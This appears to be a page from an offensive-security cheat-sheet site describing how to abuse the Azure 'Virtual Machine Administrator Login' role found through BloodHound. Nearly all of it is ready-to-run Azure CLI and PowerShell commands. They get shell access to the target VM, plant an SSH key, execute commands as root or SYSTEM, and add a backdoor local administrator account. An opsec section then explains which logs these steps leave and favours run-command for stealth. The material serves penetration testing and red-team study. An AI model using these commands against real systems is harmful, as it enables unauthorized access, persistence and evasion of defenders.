🐚 GTFOBins πŸͺŸ LOLBAS πŸ’Ύ Compiled Binaries 🩸 BloodHound 🩸 bloodyAD πŸ“œ Certipy ☁️ Cloud ⚑ goexec πŸ€– HackTricks πŸ”Œ HardwareATT πŸ“¦ Impacket 🏰 InternalATT πŸ”€ Ligolo-ng 🐱 Mimikatz πŸ’£ msfvenom πŸ”§ NetExec πŸ€– OSAI πŸ’₯ PATT 🍳 Recipes 🎟️ Rubeus 🐍 Sliver
🩸 BloodHound / AZVMAdminLogin

AZVMAdminLogin

The source principal has the Virtual Machine Administrator Login role on the target VM, granting local administrator (Windows) or root (Linux) access via AAD-backed login.

Applies to: User β†’ AZVM

Linux Abuse

SSH to Linux VM with AAD authentication

# Install the AAD SSH extension first (or use az ssh)
az login --service-principal -u <app-id> -p '<secret>' --tenant <tenant-id>

az ssh vm \
  --resource-group <resource-group> \
  --name <vm-name> \
  --local-user <username>

# Or using az ssh with AAD token
az ssh vm -g <resource-group> -n <vm-name>

Get VM public IP and SSH directly after adding SSH key

# Add your public key to the VM
az vm user update \
  --resource-group <resource-group> \
  --name <vm-name> \
  --username <username> \
  --ssh-key-value "$(cat ~/.ssh/id_rsa.pub)"

# Get IP
az vm show -d -g <resource-group> -n <vm-name> --query publicIps -o tsv

# SSH
ssh <username>@<vm-public-ip>

Run command on VM without interactive login

az vm run-command invoke \
  --resource-group <resource-group> \
  --name <vm-name> \
  --command-id RunShellScript \
  --scripts "id; cat /root/root.txt"

# Windows VM
az vm run-command invoke \
  --resource-group <resource-group> \
  --name <vm-name> \
  --command-id RunPowerShellScript \
  --scripts "whoami; type C:\Users\Administrator\Desktop\root.txt"

Windows Abuse

RDP with AAD credentials

# Standard RDP β€” login with your AAD UPN
mstsc /v:<vm-public-ip>
# Username: AzureAD\<username>
# Password: <password>

Az PowerShell β€” run command as SYSTEM

Connect-AzAccount -AccessToken <access-token> -AccountId <username>
Invoke-AzVMRunCommand `
  -ResourceGroupName <resource-group> `
  -VMName <vm-name> `
  -CommandId RunPowerShellScript `
  -ScriptString "whoami; hostname; ipconfig"

Add local admin account via run-command

Invoke-AzVMRunCommand `
  -ResourceGroupName <resource-group> `
  -VMName <vm-name> `
  -CommandId RunPowerShellScript `
  -ScriptString 'net user hacker P@ssw0rd123! /add; net localgroup administrators hacker /add'

Opsec

  • RDP login generates Event ID 4624 (logon type 10 RemoteInteractive) on the target VM.
  • az vm run-command leaves artifacts in Azure Activity Log and on-disk at C:\Packages\Plugins\Microsoft.CPlat.Core.RunCommandWindows\.
  • AAD-based login requires the VM to have the AAD login extension installed.
  • Session takeover will disconnect the current user β€” generates a visible disconnect event.
  • Prefer run-command for stealth over interactive RDP/SSH when only code execution is needed.